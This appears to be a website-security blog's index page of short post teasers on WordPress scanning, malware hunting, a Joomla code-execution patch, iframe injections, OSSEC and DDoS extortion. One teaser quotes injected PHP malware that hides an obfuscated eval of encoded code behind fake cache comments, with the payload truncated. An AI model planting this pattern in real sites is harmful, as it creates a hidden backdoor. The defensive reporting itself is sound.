When using WPScan you can scan your WordPress website for known vulnerabilities within the core version, plugins, and themes. You can also find out if…
Some webmasters only check recently modified files when searching for malware. It may work sometimes, but many infections don’t change files’ time-stamps. There is the…
The Joomla! team released a new version of Joomla! CMS yesterday to patch a serious and easy to exploit remote code execution vulnerability that affected…
Last March we described a WordPress attack that was responsible for hidden iframe injections that resembled Darkleech injections: declarations of styles with random names and…
We see quite a few sites with the following injected PHP code: //###=CACHE START=### error_reporting(0); $strings = “as”;$strings .= “sert”; @$strings(str_rot13(‘riny(onfr64_qrpbqr(“nJLtXTymp2I0XPEcLaLcXF…skipped…Tyvqwg9”));’)); //###=CACHE END=### This malware…
We leverage OSSEC extensively to help monitor and protect our servers. If you are not familiar with OSSEC, it is an open source Host-Based Intrusion Detection…
Over the past few months, our security operations group have identified and mitigated an increasing number of DDoS attacks tied to extortion attempts from different…